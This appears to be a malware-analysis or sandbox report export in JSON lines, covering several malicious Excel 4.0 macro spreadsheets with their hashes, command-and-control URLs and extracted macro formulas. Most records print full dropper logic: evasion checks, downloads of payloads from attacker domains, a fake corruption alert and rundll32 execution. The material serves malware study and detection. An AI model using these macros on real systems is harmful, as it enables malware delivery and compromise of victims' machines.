{"version":"0.2","sample":{"sample":"","kind":"file","target":"314289c5982eb61e417d748a6262a8c70b42ccc1c7a014b367c14e02a4145c78"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"314289c5982eb61e417d748a6262a8c70b42ccc1c7a014b367c14e02a4145c78","filesize":160768,"md5":"0100252fe5c389076ebef023b91da6ef","sha1":"ad0e003326ca7a9819a78b4316278eb7505bcb5d","sha256":"314289c5982eb61e417d748a6262a8c70b42ccc1c7a014b367c14e02a4145c78","sha512":"eec96d02a408545bac24d0429d7c600f95a61b7832c1c29cd848ba5f638ab10bb1a171a2b4eddf10859c0e236bc30209a0c0eea54d7f5df7068a38690cb99773","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"314289c5982eb61e417d748a6262a8c70b42ccc1c7a014b367c14e02a4145c78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TTMGROSwCj\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3145f11e8aed0a388d99dc57307cff2cd9e8e59d56b7fb8497cfd7f096293766"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"3145f11e8aed0a388d99dc57307cff2cd9e8e59d56b7fb8497cfd7f096293766","filesize":152576,"md5":"dc49f547762107ad02d6dd3f7f20bc12","sha1":"2c4cbde0d03f6abd340bd5f13bd5df7d6a5b4b79","sha256":"3145f11e8aed0a388d99dc57307cff2cd9e8e59d56b7fb8497cfd7f096293766","sha512":"46fe5c26b8758916669ab0a2f705d315e0c9257113096996fcb2414cc1e7515a6050e7265a14aaaab083c938544ac76604126bbb4b35afc1d2c6d4edae5ffec9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3145f11e8aed0a388d99dc57307cff2cd9e8e59d56b7fb8497cfd7f096293766.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oqncLuWBi3\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3146c12bd0e0fe419f05d739f21d3b97007c789b243719d30111e3b4ebebdb5d"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"3146c12bd0e0fe419f05d739f21d3b97007c789b243719d30111e3b4ebebdb5d","filesize":112640,"md5":"b20cc3f169fe68c22b79734e63faa676","sha1":"0b57206886964aeb21805ac079eb6d1767536796","sha256":"3146c12bd0e0fe419f05d739f21d3b97007c789b243719d30111e3b4ebebdb5d","sha512":"7afc4dfdfc2d2dfa602705fdcb5250d28790ca7266ee028946d78d4a6264c15924d4606583d7a73c767a17d6e1ee909ba6ac40592e71ecb30b36ecccb21056f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3146c12bd0e0fe419f05d739f21d3b97007c789b243719d30111e3b4ebebdb5d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3146d5aab085c454fcc3008a80cd22bae2b621d8fd2eefd31843f725f2a1f579"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"3146d5aab085c454fcc3008a80cd22bae2b621d8fd2eefd31843f725f2a1f579","filesize":142848,"md5":"f37a478c49c695717fc9241c7230dd09","sha1":"e62f2b00229bbc03d9e4f8c88c2475b888ac4256","sha256":"3146d5aab085c454fcc3008a80cd22bae2b621d8fd2eefd31843f725f2a1f579","sha512":"5ccb29fe9f2952b924b965affb843865f4d2143388a81d006f7248a0cbedaa9a9e8a7dceb5258b371938fd4668c168bebf3605660ad4a9f4388a3e700a4187e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3146d5aab085c454fcc3008a80cd22bae2b621d8fd2eefd31843f725f2a1f579.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"G0VwqhnZPY\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3147351be61fec20bfd0e567b7d3f4c91eaece8cd1be72cfea0794c246f548a5"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"3147351be61fec20bfd0e567b7d3f4c91eaece8cd1be72cfea0794c246f548a5","filesize":167936,"md5":"1d69a6cbbbbadb3b29632568e98e03e8","sha1":"902b846b363608014bf36eba1355c0ff347b7113","sha256":"3147351be61fec20bfd0e567b7d3f4c91eaece8cd1be72cfea0794c246f548a5","sha512":"f9dea1611623a37eff2dc2d4ebfe0c2a16fe620087949c94f1569503a85c5db2898caddff9d2d9e3c6ceae5a6aa6ace2dac8c775d0de2fa3a038843eb9aa1c5e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3147351be61fec20bfd0e567b7d3f4c91eaece8cd1be72cfea0794c246f548a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AGAfetHATV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"315b63f4380fb024bead356acb8a46850da53741b40bb5c87c71b6e78f52219e"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"315b63f4380fb024bead356acb8a46850da53741b40bb5c87c71b6e78f52219e","filesize":160768,"md5":"2cddd3aa1d43426f12a7111a6326f9b9","sha1":"4f89f6dd55604d9562b70de615a7da886c0a0187","sha256":"315b63f4380fb024bead356acb8a46850da53741b40bb5c87c71b6e78f52219e","sha512":"ecaaf2c41f4cdd2e6b4eff9634794ad5420a22d82c3f206f19dffb71c8d5d594bc9f2759fea87e9ab3fa370d69ccc6d194289aa2a9e7e7d00dce33c824ba3c04","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"315b63f4380fb024bead356acb8a46850da53741b40bb5c87c71b6e78f52219e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AqGa4pqR2C\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31681173d97b57045d5f8cb25d9c2673d1c82bb187031f5a9f2bc1dec92e6db4"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31681173d97b57045d5f8cb25d9c2673d1c82bb187031f5a9f2bc1dec92e6db4","filesize":185344,"md5":"fefc13458fc459e0debdb015983d284d","sha1":"797c9d79e1cd94c05677cbce37552dfbbf543b3d","sha256":"31681173d97b57045d5f8cb25d9c2673d1c82bb187031f5a9f2bc1dec92e6db4","sha512":"1fb75e77535a9ca1de913270c65c78ec7e5f22679b114510ce4fe5fffa96cf3b3dc5010ca6d66813ff2ff2d4de208795f841bc86dd1d8aea925e3efdda79a05b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31681173d97b57045d5f8cb25d9c2673d1c82bb187031f5a9f2bc1dec92e6db4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3173fd67101dfb96ab9fca6960a1e3f88d8aa83a30a76fc38cccb745dc5c4f77"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3173fd67101dfb96ab9fca6960a1e3f88d8aa83a30a76fc38cccb745dc5c4f77","filesize":116224,"md5":"64c7cb25f2e8c2337df102be51695f2c","sha1":"096350997edcfe2303ee2eb955e2feeb8e006eb6","sha256":"3173fd67101dfb96ab9fca6960a1e3f88d8aa83a30a76fc38cccb745dc5c4f77","sha512":"36b0d6d4d0a7ce012d46b0a411a0f5c2c59ad5904843913599dedc8c23c101ff643f9089c05ab322e27778160001bb2f968e5df8ef1a3dbf3d047cea8693054b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3173fd67101dfb96ab9fca6960a1e3f88d8aa83a30a76fc38cccb745dc5c4f77.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8QhPSYTiXW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3191d5f5f0d3a704002a52e56686aad6eb3540f663fd6c1d691933d4d8621118"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"3191d5f5f0d3a704002a52e56686aad6eb3540f663fd6c1d691933d4d8621118","filesize":185344,"md5":"91b5ce6ad8904bf2fd08a1297d302b58","sha1":"e692d45f11e067e4fa3cd82f8f04e4ecbe19154c","sha256":"3191d5f5f0d3a704002a52e56686aad6eb3540f663fd6c1d691933d4d8621118","sha512":"d95a9b77968725b3b00d1187bd387166ef766b606f6d75f587f953bfe36118cdfc76e4fdf20c43b240ba1ac05ffb018c62bcf044fafab36015f1ed6d63255903","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3191d5f5f0d3a704002a52e56686aad6eb3540f663fd6c1d691933d4d8621118.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31b38e3a1b72496d891133926aaf4eb880fab56921ac007423517ec12c843c91"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31b38e3a1b72496d891133926aaf4eb880fab56921ac007423517ec12c843c91","filesize":185344,"md5":"e35a2c436288d6adb33aca2e05f63d16","sha1":"9eea69ab012ce863f5904a5a946a8d06f68efaf2","sha256":"31b38e3a1b72496d891133926aaf4eb880fab56921ac007423517ec12c843c91","sha512":"f5806ab5b019a6f636f1151e24d97d5616162ae750321123dcf1af25d3342e5c7bbf61b5cdab313fee92878997b3d21bd970687a28c60f9af0e9d785debe16dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31b38e3a1b72496d891133926aaf4eb880fab56921ac007423517ec12c843c91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31bcb470ada6df6e90ced5df318d717b12867feb1b17cf081af9cf0cad3ca895"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31bcb470ada6df6e90ced5df318d717b12867feb1b17cf081af9cf0cad3ca895","filesize":112640,"md5":"3f9b440f2f9440efa62edeeefd7faa8c","sha1":"6e7edb01d119dfd61ca95940744ca0ae18d21745","sha256":"31bcb470ada6df6e90ced5df318d717b12867feb1b17cf081af9cf0cad3ca895","sha512":"c6bff3b80f054eaa0bce149c6c18560a620583c845ddcd98a2374c14d5090b6eaac155daa0a5590240316298f8ad0600e57fba09f68811fd5d72990ef85cf0e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31bcb470ada6df6e90ced5df318d717b12867feb1b17cf081af9cf0cad3ca895.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31d22dc2d95d1581210f46c52d21d22b04f660cc210160cafd38abd9fea0cc63"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31d22dc2d95d1581210f46c52d21d22b04f660cc210160cafd38abd9fea0cc63","filesize":209920,"md5":"c0f6bef6b23a3c03c1a350d5f4ea5df5","sha1":"75dcd671c1aafb8bc879aacd58c36d2b91c46c60","sha256":"31d22dc2d95d1581210f46c52d21d22b04f660cc210160cafd38abd9fea0cc63","sha512":"15ed685627e4a8fc669dc511f9040fca1dbd8fcc100a40eef6a80467640735b05cc0c2d0078e9eba988008be1d3b6a2a0f6c5200ee3d88c08c5ce79198c3898b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31d22dc2d95d1581210f46c52d21d22b04f660cc210160cafd38abd9fea0cc63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dFDmxOMPYV\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31dea3d744cfedf313ff493140839a460419275e363972473c6815af016a3222"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31dea3d744cfedf313ff493140839a460419275e363972473c6815af016a3222","filesize":185344,"md5":"5739809737ae0ea69996434237412ff3","sha1":"5ef6fe73d501d9ed6545a0155de01652c3879703","sha256":"31dea3d744cfedf313ff493140839a460419275e363972473c6815af016a3222","sha512":"777ac30d920083cd787efcd363668f89bd76d55829d0739cf83e67c03fa90e45f05de16a7bdbc21badc3fe83270f28c32ea284e00a7f44afaca9154d72614ba2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31dea3d744cfedf313ff493140839a460419275e363972473c6815af016a3222.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31e1c50adcbaa842d868e05f4cce8eb36fe6809cf02c40399e89363b341428a5"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31e1c50adcbaa842d868e05f4cce8eb36fe6809cf02c40399e89363b341428a5","filesize":116224,"md5":"fa0e5d7547784a891cd6c22fff0e210c","sha1":"52885d63a6e8219313acc1d77459dea63d14b947","sha256":"31e1c50adcbaa842d868e05f4cce8eb36fe6809cf02c40399e89363b341428a5","sha512":"3e04603b236d77b19e53ab5dcf2a7ca4e7ca995dfd9a1756677fe4897652ee31bb451cccdcee735f48023c0b979456381f07b838606efdd0feffdb0b5287f7af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31e1c50adcbaa842d868e05f4cce8eb36fe6809cf02c40399e89363b341428a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Hz9Z3vQfqO\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31eaddd761f2a23dc9bcdf29979c256c46ed005d45a455e1e7dd862efbedd441"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31eaddd761f2a23dc9bcdf29979c256c46ed005d45a455e1e7dd862efbedd441","filesize":112128,"md5":"2919dc7ed46abe5e69eeeebf117effc1","sha1":"d00e56a8810e500f37073896207fecee35d66ff5","sha256":"31eaddd761f2a23dc9bcdf29979c256c46ed005d45a455e1e7dd862efbedd441","sha512":"5f3bc706edd5985172791edd0cab3807f70a1ad0e7fd17f88e96628355613513bc5829830311af3fd500f42fac1fdb6ea8ad7e3cb1726a61cf5d70edc0890e53","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31eaddd761f2a23dc9bcdf29979c256c46ed005d45a455e1e7dd862efbedd441.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31edaef95c561c6c8ad04f7e905495e0b0efe44e2ba12c6944fa4ef741480bef"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31edaef95c561c6c8ad04f7e905495e0b0efe44e2ba12c6944fa4ef741480bef","filesize":185344,"md5":"56be7fcf348b3e6e40283b4f2f4ea67e","sha1":"549d67b73820f6460217f540fd998c4706f0a692","sha256":"31edaef95c561c6c8ad04f7e905495e0b0efe44e2ba12c6944fa4ef741480bef","sha512":"b282ee7c4aad5e80b947f0d29fa2cc93e04f5a1db15dd214f68c3dab88befb874861367fb38172fc8a623b7a017c30d8c431a46dd652070aee2d3de5374aec35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31edaef95c561c6c8ad04f7e905495e0b0efe44e2ba12c6944fa4ef741480bef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31ee8e62c0fef1c440fd907c1edbb252a992d7615f839ca25c8c417f9507dfee"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31ee8e62c0fef1c440fd907c1edbb252a992d7615f839ca25c8c417f9507dfee","filesize":185344,"md5":"d6787543325996a662ac21759196b0a1","sha1":"df8ca68033e4fc3a7c19f3f55fe8e381c6b1606f","sha256":"31ee8e62c0fef1c440fd907c1edbb252a992d7615f839ca25c8c417f9507dfee","sha512":"5d2952fa4acf30fb380f160c3b4cf5942ddbcb85af482d9e0efcdf514949e35623d9089f850f743bc31f3d21ec41aadcce30b878e91bb85d09413de5fb16c778","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31ee8e62c0fef1c440fd907c1edbb252a992d7615f839ca25c8c417f9507dfee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31f50c98d7cc850728eda4b1f8c26faf3474899976bb7af4a1be5169d6c90f35"},"analysis":{"reported":"2020-04-09T16:15:39Z","score":10},"files":[{"filename":"31f50c98d7cc850728eda4b1f8c26faf3474899976bb7af4a1be5169d6c90f35","filesize":225280,"md5":"7f5c9bf969687fd054de43bb1915d63f","sha1":"0541eef4a39964cfec1815d14d6d53d18f7d77ff","sha256":"31f50c98d7cc850728eda4b1f8c26faf3474899976bb7af4a1be5169d6c90f35","sha512":"a6b07e13c367d02d2f48320d09c1e000062e4aff9be5750138a8ea262fe5d858c6ef5c33a17c011db401034605762a38f02325a2d446d30fe24d3f6b9a43bbdf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31f50c98d7cc850728eda4b1f8c26faf3474899976bb7af4a1be5169d6c90f35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 